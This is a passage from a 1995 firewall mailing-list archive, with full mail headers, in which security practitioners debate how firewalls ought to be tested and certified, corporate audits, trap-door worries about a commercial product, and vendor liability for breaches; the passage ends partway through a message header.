"certification" is the matter of testing, and that's a really tough nut to crack. Before you can certify a firewall, you need to be able to measure it against some kind of yardstick and determine if it is adequate. Even the concept of adequacy is slippery to come to grips with. A firewall may be adequate from a security perspective but unable to do the job because of some special requirement, cost, or whatever. More importantly, a firewall needs to be correct FOR ITS PROPOSED USE and that needs to be taken into account when it is "certified." In the past I've given the example of a highly secure high assurance firewall for Email only, which can be easily implemented using a screening router and a UNIX machine. In some people's eyes that might not even be a "firewall" -- a rigid code for certification likely would not cover such an approach as "OK." The DOD computer security rules actually require that a system be considered in its entirety before being certified as acceptable, which was intended to permit someone to make a solid case that a particular approach was sound, without going through all the rigamarole. Unfortunately, it's turned into a bureaucratic trap door through which all manner of braindamaged nonsense can be certified as acceptable. So how do you test a firewall? I believe there are 2 approaches, which are not necessarily mutually exclusive or incompatible: 1) Programmed "checklist" testing 2) Design-oriented testing "Checklist" testing would amount to running SATAN++ against the firewall and failing it if SATAN++ found a hole. Do not pass go, do not collect $200. The problem with this approach is that it is very limited: a bug that we don't test for in SATAN++ could slice right through the firewall tomorrow and we'd have to invalidate the whole certification and recertify. The advantage of the "checklist" approach is that it's cheap, quick, easy, and it lets a vendor put a certification "seal of approval" on their product and everyone can get a quick set of warm fuzzies and tell their boss they have exercised due diligence. Design-oriented testing is when you walk into the room where the engineers who wrote the firewall sit, and start with the question: "Why do you think this firewall protects networks and itself effectively?" and go from there. Depending on the answers they give you, you then formulate a set of tests which propose to verify the properties they claim the firewall has. So, if I tell you my firewall works by testing the psychic *intent* in each packet, a test would be derived whereby we would send malicious packets at the firewall and see if they were blocked. Then we'd send the same packets without thinking nasty thoughts while we did it, and see if they went through. In other words, the test is a custom-tailored approach that matches the design of the system. The problem with design-oriented testing is that it's hard. It takes skills that are not presently common - I only know 5 people that I would believe could do a good job of this (incidentally, none of them work at NSA) -- it's expensive, slow, and it's hard to explain because to even explain or understand a serious red team review requires a pretty high level of expertise. I've heard scary stories of people doing "firewall testing" who do not understand UNIX. So, for example, they will tell you the firewall is insecure if the sendmail executable has not been deleted. So their checklist is maybe a little bit off. :) I've heard of other scary stories about people getting an auditor for a firewall and having a CNE appear. It's a networking problem, so who is better qualified than a Certified Network Engineer, right? If someone hired me to do a design-oriented test of a VMS firewall, that'd be pretty ridiculous, too - I'm a UNIX guru, and am completely unqualified to find a hole in a VMS product. The market is ripe right now for someone to come along and start certifying firewalls. NSA will probably do it for their customer base, which is government only. As such they will slant their "What is good" requirements to meet their political/technological agenda: NSA approved crypto only, and Fortezza. The question is: If someone starts certifying firewalls, will the certification have any intellectual integrity? I recently rather derisively dismissed an RFI from a large consulting company that wants to hire "firewall test consultants" and asked for a detailed writeup of the methodology used. (My response was a description of design-oriented testing) From the layout of the RFI it was pretty clear that they were building a laundry list and were canvassing other consultants to help fill out their own laundry list. Being certified on those terms should not make anyone sleep better at night. Big laundry lists are better than small laundry lists but if you were to look at the set of facts that SATAN1.0 tested for, there are at least 4 new things since it's release that have been discovered. If SATAN1.0 were your firewall test "methodology" you would be toast, right now. So: back to the original question "who should they be?" and "who do you trust?" "They" should be the top experts in the field for the particular type of firewall you are talking about. That means that if it's a VMS based firewall, it'd better be a VMS guy, not me, smb, or ches. We don't do VMS. :) If it's a router, then it should be someone who really knows routers. Etc. "Who do you trust?" - depends on what you've got to lose. mjr. From firewalls-owner Sat Sep 9 06:02:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA21189 for firewalls-outgoing; Sat, 9 Sep 1995 05:33:34 -0700 Received: from research.att.com (research.att.com [192.20.225.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA21182 for ; Sat, 9 Sep 1995 05:33:31 -0700 From: smb@research.att.com Message-Id: <199509091233.FAA21182@miles.greatcircle.com> Received: by gryphon; Sat Sep 9 08:31:09 EDT 1995 To: Firewalls@GreatCircle.COM cc: dmurphy@coltrane.cwa.com Subject: Re: Corporate Audits Date: Sat, 09 Sep 95 08:31:08 EDT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk So, have any of you big-business wage-slaves had corporate auditors come into your shop and ask questions (perceptive or otherwise) about firewalls and network security yet, and if so, would you be willing/able to share such stories with the list? I'm not sure if I should name names or not -- it's not my place to do so -- but I know for certain that at least one large industrial outfit was barred by their auditors from connecting to the Internet until they had a heavy-duty firewall in place. From firewalls-owner Sat Sep 9 06:02:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA21290 for firewalls-outgoing; Sat, 9 Sep 1995 05:51:50 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA21283 for ; Sat, 9 Sep 1995 05:51:45 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA13022; Sat, 9 Sep 95 07:38:42 -0400 Date: Sat, 9 Sep 95 07:38:41 -0400 Message-Id: <9509091138.AA13022@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Who you gonna trust ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mjr rites: "bits and pieces" (what is an ASCII music symbol ?) >For a single authority to certify a >firewall will imply a single authority imposing its idea of >"correct design": a role NSA has adopted in the past with varying >levels of success and questionable benefits to the community. I must respectfully say that this is a simplistic view of a "certifying authority" and hold up the Society of Automotive Engineers (SAE) as another way. The multi-volume "SAE Handbook" covers a broad number of standards relating to automobiles. If you want to know what "5W-30" means, look at SAE J183. Similarly, each class of service (e.g. SMTP) would have a separate set of standards (the RFC is a place to start) and tests to certify that it does this and only this. One logical subtest would be an "overflow test". But this is not where the testing would start, rather it would begin just as the 7 layer model does, with the physical layer, defining the accaptable level and type of electrical/optical signals accepted and possibly suggesting action to occur if not reached or exceeded. > More importantly, a firewall needs to be correct FOR ITS >PROPOSED USE and that needs to be taken into account when it is >"certified." Exactly right but to do so, you must start at the bottom (well, until certain structures are certified to meet the requirements up to a point, then those systems using that structure may build on it in ways suported by that structure, and need only test the additions. > I believe there are 2 approaches, which are not necessarily >mutually exclusive or incompatible: > 1) Programmed "checklist" testing > 2) Design-oriented testing > "Checklist" testing would amount to running SATAN++ against >the firewall and failing it if SATAN++ found a hole. Do not pass go, >do not collect $200. Here I disagree. S*T*N is a "quick and dirty" test. That it succeeeds or does not succeed depends on a specific set of circumstances that are available from the node level. It does *nothing* to test the physical layer as I mentioned above yet to *certify*, it must. I suspect that the problem here (and on this list in general) is "when all you have is a hammer, everything starts to look like a nail". Certain elements, being inherantly unreachable from a workstation or notebook, are dismissed. Just as an example of one I have not seen addressed, is what does a firewall/ system combination do when given port address 32,793 ? Is a legitemate port number, yet I have heard tales of wrapping... S*T*N does not test it. Even the FWTK post strober does not reach that high. Some would say it is silly to go that far and it would be impractical unless sitting next to the device to test all 65k yet *they are there*. > The problem with this approach is that it is >very limited: a bug that we don't test for in SATAN++ could slice >right through the firewall tomorrow and we'd have to invalidate the >whole certification and recertify. The advantage of the "checklist" >approach is that it's cheap, quick, easy, and it lets a vendor put a >certification "seal of approval" on their product and everyone can >get a quick set of warm fuzzies and tell their boss they have >exercised due diligence. Exactly what I was getting at. Of course if the only reason for "certification" is to CYA then the above doesn't matter - just find a group in or around Washington with an impressive set of initials to sell you one. (BTW where can I buy a law degree ?). > Design-oriented testing is when you walk into the room where >the engineers who wrote the firewall sit, and start with the question: >"Why do you think this firewall protects networks and itself effectively?" >and go from there. This also leaves out too much. Where did they start their assumptions ? For what environment ? What is a Network (TCP/IP, IPX, Vines ) ? > I've heard scary stories of people doing "firewall testing" >who do not understand UNIX. So, for example, they will tell you the >firewall is insecure if the sendmail executable has not been deleted. "When you are a hammer..." - Sorry but the world does not revolve around UNIX. Some firewalls build on that as a base, more have a front end that *looks* sort of like UNIX because a lot of people are familiar with/ expect that syntax so get a "warm and fuzzy". Real engineers do not go by feelings (hunches & intuition now...). Of course real engineers spend a lot of time being bored while watching tests. >If someone hired me to do a design-oriented test of a VMS firewall, that'd >be pretty ridiculous, too - I'm a UNIX guru, and am completely unqualified to >find a hole in a VMS product. Am (or used to be 8*) qualified - have written enough VMS device drivers to say there is No Way I'd accept a VMS firewall. Ultrix or VaxElin (does it still exist ?) maybe but not VMS for the same reason I have my doubts about NT. Ring/privilege based systems are good so long as nothing crosses the rings. Once you start... This is the reason I prefer a collection of dumb, single-state machines. > The market is ripe right now for someone to come along and >start certifying firewalls. Yes, I saw the NCSA announcement. > NSA will probably do it for their customer >base, which is government only. As such they will slant their "What >is good" requirements to meet their political/technological agenda: Nothing wrong with that so long as you can be reasonably sure what their agenda is and that will be evident by an examination of their testing methodology which is another issue - I would not trust *any* cetificating authority which did not make its methodology available for examination. > I recently rather derisively dismissed an RFI from a large >consulting company that wants to hire "firewall test consultants" >and asked for a detailed writeup of the methodology used. (My response >was a description of design-oriented testing) From the layout of >the RFI it was pretty clear that they were building a laundry list >and were canvassing other consultants to help fill out their own >laundry list. LLPs (Limited Liability Partnerships) supplimented by a cast of captive consultants seem to be very attractive to the biggies nowadays, not so sure what is in it for a Really Good Consultant since nothing is guarenteed other than "we will steer business we don't want your way" and is evident that it will be Sayonara as soon as they build their stable of just-out-of-school (e.g. cheap) network guys on the reps of the LLPs (have been approached by some myself). > "Who do you trust?" - depends on what you've got to lose. True. Reminds me of the story a little while ago about a manager who was getting bonuses for spending almost nothing on security while stroking upper management. When asked what he would do if an incident occured said: "This year I'll just find another job, next year I'll have enough to retire..." Point I am trying to make is that a "security professional" must be concerned primarily with exception avoidance. Unfortunately, if you are successful, nothing happens, so why are you needed ? Run into this problem myself - we have these things called "metrics" essentially "what did you do this week". Minor flap was the winword.concept/ prank macro/wordmacro virus. Found out about it several weeks ago & put together an easy/effective defense (combination of "Prompt to save Normal" & "DisableAutoMacros". When the fuss started I sent out a note. So what are the metrics ? An hour for the note ? Could not list the hours spent the week before because then there was no problem (and might not be) - Research ? We have no budget for that. Of course I guess the fact that I still have a job indicates something... Meanwhile back on track: so what we need is an independent certifying authority like Underwriters or the SAE to create standards (no activity on the firewalls-standards list lately). Problem is that those who could set something like that up are not the people needed to do the work - why magazines/movies separate it: the publishers/producers bring the money in and the editors/directors decide how it goes out. Both are full time jobs requiring entirely different skills. Our trouble is that we have a lot of good directors and actors but the producers are mainly snake oil salesmen. Those who might be able to transition are tied down by job/family. I figure it would take a seed of U$10 million to get started and U$3 million a year for three years to produce anything meaningful - any takers ? Warmly, Padgett From firewalls-owner Sat Sep 9 12:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA24862 for firewalls-outgoing; Sat, 9 Sep 1995 12:03:19 -0700 Received: from mtldns.mtl.unisysgsg.com (mtldns.mtl.paramax.com [128.126.52.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA24855 for ; Sat, 9 Sep 1995 12:03:15 -0700 Received: from monsmtp.mtl.unisysgsg.com (monsmtp.mtl.paramax.com) by mtldns.mtl.unisysgsg.com (4.1/SMI-4.1) id AA10937; Sat, 9 Sep 95 14:38:07 EDT Received: by monsmtp.mtl.unisysgsg.com with Microsoft Mail id <3051E51E@monsmtp.mtl.unisysgsg.com>; Sat, 09 Sep 95 15:03:58 EDT From: "Belisle, Michel @ MON" To: firewalls Subject: Firewalls product Date: Sat, 09 Sep 95 15:00:00 EDT Message-Id: <3051E51E@monsmtp.mtl.unisysgsg.com> Encoding: 8 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for a firewall comparison chart, a document that will compare most popular products, and identify what each can and can't do ? Michel Belisle, Information Technology, mbelisl@mtl.unisysgsg.com From firewalls-owner Sat Sep 9 12:32:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA25242 for firewalls-outgoing; Sat, 9 Sep 1995 12:19:00 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA25230; Sat, 9 Sep 1995 12:18:53 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 9 Sep 1995 12:18:15 -0800 To: smb@research.att.com, Firewalls@GreatCircle.COM From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Corporate Audits Cc: dmurphy@coltrane.cwa.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 8:31 AM 9/9/95, smb@research.att.com wrote: > So, have any of you big-business wage-slaves had corporate > auditors come into your shop and ask questions (perceptive or > otherwise) about firewalls and network security yet, and if > so, would you be willing/able to share such stories with the > list? > >I'm not sure if I should name names or not -- it's not my place to do >so -- but I know for certain that at least one large industrial outfit >was barred by their auditors from connecting to the Internet until they >had a heavy-duty firewall in place. Which, if they're not VERY careful, merely means that the organization is going to have a dozen or more "underground" connections spring up at various sites and within various groups, each of which individually is probably fairly insecure. It's just too easy for somebody to go get a modem and phone line (or, heck, even an ISDN or frame relay line), and service from some local or national service provider. They'll be in place and in use and invaluable to the groups using them, and (alas) probably not properly secured. How to deal with this varies by organization. However, blanket "Thou shalt not connect to the Internet" directives are very difficult to enforce, and seldom have the desired effect. You've got to provide useful alternatives (like a useful connection through a properly secured central firewall). The key is, the USERS determine the definition of "useful"; if they determine that what you're offering doesn't meet their needs, they'll go around you. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Sat Sep 9 22:30:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA00517 for firewalls-outgoing; Sat, 9 Sep 1995 22:22:53 -0700 Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA00510 for ; Sat, 9 Sep 1995 22:22:49 -0700 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id BAA18485 for firewalls@greatcircle.com; Sun, 10 Sep 1995 01:43:23 -0400 From: "Marcus J. Ranum" Message-Id: <199509100543.BAA18485@switchblade.iwi.com> Subject: rant on testing expands into white paper - To: firewalls@greatcircle.com Date: Sun, 10 Sep 1995 01:43:22 -0400 (EDT) Reply-To: mjr@iwi.com Organization: Information Warehouse! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 713 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The recent rant I posted here on testing firewalls, and "certifying" them addresses a topic I feel is very important for us all to think about. It's the whole problem of how to test something that is incredibly configurable, field-installable, customer-upgradeable, complex, and vitally important. Anyhow - I have a lot of opinions on the topic and I thought I'd get them off my chest by extending my previous mail into a short white paper. It's on: http://www.iwi.com/iw-pubs.html I hope it can serve as a trigger for further discussions. In fact, if anyone has any rebuttals or other testing-related white papers they'd like hyperlinked or posted on the 'web, I'd be happy to host them on my server. mjr. From firewalls-owner Sun Sep 10 01:00:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA01728 for firewalls-outgoing; Sun, 10 Sep 1995 00:42:56 -0700 Received: from aristo.tau.ac.il (aristo.tau.ac.il [132.66.32.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA01721 for ; Sun, 10 Sep 1995 00:42:50 -0700 Received: from radguard.co.il ([192.114.26.210]) by aristo.tau.ac.il with SMTP id AA01414 (5.67b/IDA-1.5 for ); Sun, 10 Sep 1995 10:41:12 +0300 Received: by radguard.co.il (4.1/SMI-4.1) id AA10129; Sun, 10 Sep 95 09:40:35 IDT Received: from elgamal.radguard.co.il(192.114.210.2) by gatekeeper.radguard.co.il via smap (V1.3) id sma010127; Sun Sep 10 09:40:14 1995 Received: by elgamal.radguard.co.il (4.1/SMI-4.1) id AA20958; Sun, 10 Sep 95 09:40:11 IDT Date: Sun, 10 Sep 95 09:40:11 IDT From: ronys@elgamal.radguard.co.il (Rony Shapiro) Message-Id: <9509100640.AA20958@elgamal.radguard.co.il> To: firewalls@greatcircle.com Subject: Re: Firewall-1 concerns Reply-To: ronys@radguard.co.il Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Recently, "Someone very concerned" posted (anonymously) to this mailing list regarding the Firewall-1 product. The poster was concerned that since the source code is not available to the reseller of the product, a trap door may have been installed. This is a valid point, but I don't understand why the poster would trust the reseller any more than he/she trusts (or doesn't trust, in this case) the developer! Indeed, for the truly concerned, even source code availability for the customer is insufficient (the compiler may be doctored to insert a trap door). So one can only wonder about the anonymous poster's _real_ motives: > I'm afraid that companies may look at the Sun firewall-1 product and > think that Sun has inspected the code for trapdoor and such in the code > that may have put there under orders from the Masad. In fact, I heard > one person say that in looking at the binary there is very suspicious > code. 1. And what assurances would we have that Sun (or the NSA) wouldn't insert a trap door if they had the sources? 2. The last sentence is a bit vague, perhaps the poster would care to elaborate? Notes: I am in no way connected with either Checkpoint (the company which wrote Firewall-1) or Sun. I am an (insulted) Israeli citizen. ----------------------------------------------------------------- Rony Shapiro | Phone : 972-3-6459556 RADGuard Ltd. | Fax : 972-3-6480859 8, Hanechoshet St. | E-mail: ronys@radguard.co.il Tel Aviv 69710 Israel From firewalls-owner Sun Sep 10 04:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA04281 for firewalls-outgoing; Sun, 10 Sep 1995 03:54:49 -0700 Received: from boombox.cyber.com.au (boombox.cyber.com.au [203.7.155.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA04273; Sun, 10 Sep 1995 03:54:38 -0700 Received: (from root@localhost) by boombox.cyber.com.au (8.6.8/8.6.6) with UUCP id UAA32223; Sun, 10 Sep 1995 20:53:07 +1000 Received: (from mikec@localhost) by phyto.cyber.com.au (8.6.9/8.6.9) id UAA02903; Sun, 10 Sep 1995 20:16:37 +1000 From: Mike Ciavarella Message-Id: <199509101016.UAA02903@phyto.cyber.com.au> Subject: Re: Interpreting CERT advisories To: Brent@greatcircle.com (Brent Chapman) Date: Sun, 10 Sep 1995 20:16:36 +1000 (EST) Cc: bdboyle@maverick.erenj.com, firewalls@greatcircle.com In-Reply-To: from "Brent Chapman" at Sep 8, 95 09:41:37 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 471 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The fact that there are lots of CERT advisories for a given vendor > doesn't (necessarily) mean that vendor is somehow less secure; it _does_ > means that the vendor is more willing than others to cooperate with CERT > in producing advisories (which I think is a feature, not a bug). It's also a (very rough) indicator of the types of machines ppl have (and have access to). How many advisories or potential holes have been reported on net-connected MVS boxen? Mike From firewalls-owner Sun Sep 10 11:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08498 for firewalls-outgoing; Sun, 10 Sep 1995 11:24:51 -0700 Received: from pony-express.ims.advantis.com (pony-express.ims.advantis.com [165.87.194.144]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA08491 for ; Sun, 10 Sep 1995 11:24:47 -0700 Received: by pony-express.ims.advantis.com (5.67b/4.03) id AA21529; Sun, 10 Sep 1995 14:19:20 -0400 Received: from pangloss.ims.advantis.com(164.120.180.21) by pony-express.ims.advantis.com via smap (V1.3) id sma019222; Sun Sep 10 14:19:14 1995 Received: by pangloss.ims.advantis.com (AIX 3.2/UCB 5.64/4.03) id AA28764; Sun, 10 Sep 1995 14:23:15 -0400 Message-Id: <9509101823.AA28764@pangloss.ims.advantis.com> Subject: Re: mirrored fw To: ee@mailhost.hooked.net (Eric Eigenfeld) Date: Sun, 10 Sep 1995 14:23:14 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199509082145.OAA02362@chum.hooked.net> from "Eric Eigenfeld" at Sep 8, 95 02:45:06 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 1522 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I am developing plans for a mirrored fw architecture. The client requires > 2--->n locations, each with its own independently operating ,complete > architectures that could assume control on demand. User base is quite > large, and firewalls are already implemented and functioning in multiple > locations. > > Throw in automatic mirroring of changes to internal and external web > servers, a left handed monkey wrench for adjustments, and they're happy. > > Any experiences with mirrored firewalls? SUP for instance is a very nice tool for remote deployment. Basically anything that can do remote deployment with strong authentication should do the trick. But you probably not only need remote deployment, but also remote execution. SSH might do the trick for that part, then again, you might as well use SSH's rcp for remote deployment with SSH's rsh for remote execution. Or, you could completely kerberize your firewalls. Lotsa options. Almost anything will do. What exactly do the web servers have to do with your firewall management?... Maybe a little bit more explanation of what you were trying to accomplish in what kind of setup would be a great idea. :) And why are you mirroring them, for redundancy only or increased performance? Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz (914) 684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: (914) 684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Sun Sep 10 12:32:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA09360 for firewalls-outgoing; Sun, 10 Sep 1995 12:13:37 -0700 Received: from pony-express.ims.advantis.com (pony-express.ims.advantis.com [165.87.194.144]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA09353 for ; Sun, 10 Sep 1995 12:13:34 -0700 Received: by pony-express.ims.advantis.com (5.67b/4.03) id AA21127; Sun, 10 Sep 1995 15:08:09 -0400 Received: from pangloss.ims.advantis.com(164.120.180.21) by pony-express.ims.advantis.com via smap (V1.3) id sma016517; Sun Sep 10 15:08:06 1995 Received: by pangloss.ims.advantis.com (AIX 3.2/UCB 5.64/4.03) id AA27573; Sun, 10 Sep 1995 15:12:07 -0400 Message-Id: <9509101912.AA27573@pangloss.ims.advantis.com> Subject: Re: Firewall-1 concerns To: silveira@nutecpa.nutec.tche.br Date: Sun, 10 Sep 1995 15:12:06 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9509081844.aa27730@canario.canario.nutecsp.br> from "silveira@nutecpa.nutec.tche.br" at Sep 8, 95 06:46:08 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 2445 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Finally, on a broader issue, a question from me: How are contracts signed > between the firewall provider and the customer with regard to the possibility > of a successful attack? Most companies are smart enough to disclaim all their responsibility for any kind of damages anyways. How much that'll hold water in a court of law is another question, especially with the general lack of competence in this field as far as the manifestations of justice are concerned. Usually, there's little hope that you can hold anybody liable, unless you can prove that they've implemented a certain shortcoming with intent, which in turn is (obviously) very difficult, if not impossible. Like, zzz sells company xxx a firewall product, takes over support and management of it with the intent to break into xxx's critical systems (a complete technical and social trojan so to speak :). That you can probably take to court with a reasonable chance of succeedind holding zzz responsible, assuming your contract does not disclaim liability and you can prove everything == *VERY* unlikely to happen. Otherwise, forget it. You can at the most fire your *own* employee, and potentially you can take the person to court. You're free to attempt holding anyone liable for anything (which is fortunately what many people try to do in the US and unfortunately, IMHO, way to many succeed in doing so), but I doubt you'll yield anything but lotsa attorney costs. Lastly, imagine international law becoming a part of this. Let's say, your box is in Russia, your alleged hacker pool is somewhere in the US, and your firewall manufacturer is Brazilian.. there's realistically speaking no way you're gonna catch anyone or hold anybody responsible. Unless you deal with something touching national security.... but to those kinds of things, the laws of gravity don't apply anyways. Anyways, I have yet to see a contract where the contractor signs over full responsibility for a firewall etc. Too many things have influence on security, such as internal policies, building security etc. There is usually not much of a contract safety-net, in my experience, many rely on the reputation alone. Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz (914) 684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: (914) 684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Sun Sep 10 14:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA11507 for firewalls-outgoing; Sun, 10 Sep 1995 14:16:06 -0700 Received: from delfin.com (delfin.com [192.129.85.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA11500 for ; Sun, 10 Sep 1995 14:16:03 -0700 Received: from delfinsd.delfinsd.delfin.com ([192.187.198.1]) by delfin.com (4.1/SMI-4.1 - 6/21/93 ) id AA14944; Sun, 10 Sep 95 14:11:05 PDT Received: from felixpc (felixpc.delfinsd.delfin.com) by delfinsd.delfinsd.delfin.com (4.1/SMI-4.1) id AA03684; Sun, 10 Sep 95 14:15:49 PDT Message-Id: <9509102115.AA03684@delfinsd.delfinsd.delfin.com> X-Sender: felix@delfinsd-gw X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 10 Sep 1995 14:13:55 -0700 To: Firewalls@greatcircle.com From: Robin Felix Subject: Re: upgrade to commercial firewalls Cc: Shawn Steele Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:24 PM 9/8/95 -0600, Shawn Steele wrote: >> If we get attacked and lose software/data etc, then >> who's liable ? >> If we use freeware products, then noone is. If we use a commercial >> product, then we can, I guess, sue the firewall supplier ... ? > >Ah, sue-happy america. I seriously doubt you'll find a supplier that >doesn't have some sort of clause specifically disallowing any damages >from using their product. (A friend recently had his house broken >into, I doubt he could successfully sue the deadbolt manufacturer). It's not the suit that's important -- it's who is responsible for "making you whole" after a loss that's the major concern. The suit is a last resort, but the knowledge (or best guess) concerning who would win the suit is the ammunition you bring to negotiation. The deadbolt manufacturer above could probably be "persuaded" to help make you whole if the deadbolt did not perform as advertised or were defective in some way, as a suit would be more costly for them than paying your damages. Likewise, any disclaimer on a commercial firewall is only good insofar as it disclaims responsibility for loss if installed and properly configured and maintained. If the product has a serious defect that allowed you to be damaged despite its proper installation and maintenance, then that firewall manufacturer could face liability despite any words to the contrary on the package. I imagine that the original writer has business loss insurance. I'd look closely at the policy to see how that insurance, generally designed for physical loss, handles data loss. If that type of coverage is excluded and you're using a homegrown or public domain firewall you're on your own, having only the destroyer to find and "convince" to make you whole, a difficult task. If you're using a commercial firewall and the loss occurred through a defect, the firewall company could face liability despite disclaimers. If your loss is covered by your insurance, on the other hand, then the insurance company (which should be calculating its premiums based on your particular site's security plan and practices) would make you whole, then go forth to get restitution from appropriate persons who could include the destroyer and the commercial firewall vendor if the product did not perform to spec. It's really their choice -- you only have to worry about collecting payment from the insurance company by convincing them that you were implementing security in a reasonable fashion, or a fashion required by your particular insurance policy. Using a commercial product may or may not give you someone to go after depending on the circumstances, but if you're hanging out without insurance it probably would give you more options than if you build the firewall yourself. BTW, while it's true that damage from data loss is a serious concern, regular backups to inaccessible offline storage should minimize that damage to the data lost since the last backup. You are doing that, aren't you? ;-) -- Robin Felix; felix@delfin.com; felix@nosc.mil 619-291-2194(work), 619-291-5852(fax), 619-991-5081(alt) http://www.delfinsd.delfin.com/ From firewalls-owner Sun Sep 10 16:30:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA13828 for firewalls-outgoing; Sun, 10 Sep 1995 16:01:32 -0700 Received: from MUKLUK.HQ.DECUS.CA ([198.53.154.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA00133 for ; Sat, 9 Sep 1995 21:57:42 -0700 Received: by mukluk.hq.decus.ca (MX V3.3 VAX) id 14783; Sun, 10 Sep 1995 00:33:39 EST Date: Sun, 10 Sep 1995 00:29:26 EST From: "Rob Slade, the doting grandpa of Ryan Hoff" X-Comment: To: header was truncated; missing 2 entries. To: kaisaki@csmc.edu, cccf@email.teaser.com, orvis@llnl.gov, jhammock@clark.net, vcrouch@wic.ca, gen@stubbs.ucop.edu, pitzel@cs.sfu.ca, eccles@freenet.vancouver.bc.ca, myles@io.org, kms@northcoast.net, jb@paris7.jussieu.fr, vclib@uts.cc.utexas.edu, kehoe@fortuity.com, lloyd_uliana@mindlink.net, temetz@carleton.edu, susan@cyberstore.ca, mae@freenet.victoria.bc.ca, pd@nwavbbs.demon.co.uk, jon@stekt.oulu.fi, swanson@csmes.ncsl.nist.gov, wells@csmes.ncsl.nist.gov, pfratus@compubooks.com, reviews@reiters.com, rjames@fox.nstn.ns.ca, roswell@fox.nstn.ca, ecbs@sas.ab.ca, sanj@wordsworth.com, afinet@books.com, jkcohen@uci.edu, keithx@technical.powells.portland.or.us, michel.bauwens@dm.rs.ch, pandres@cln.etc.bc.ca, root@mag.mechnet.com, clovf@ruby.ils.unc.edu, shrike@shell.portal.com, rob.slade@f733.n153.z1.fidonet.org, steele@wolfe.net, cnews@libtech.com, johnl@mukluk.hq.decus.ca, mulholland@psc.org, robertbl@mukluk.hq.decus.ca, swart@shr.dec.com, elizabethm@mukluk.hq.decus.ca CC: brock@ucsub.colorado.edu, book-reviews@news.colorado.edu, misc-books-technical@cs.utexas.edu, alt-books-technical@cs.utexas.edu, biz-books-technical@cs.utexas.edu, risks@csl.sri.com, firewalls@greatcircle.com, 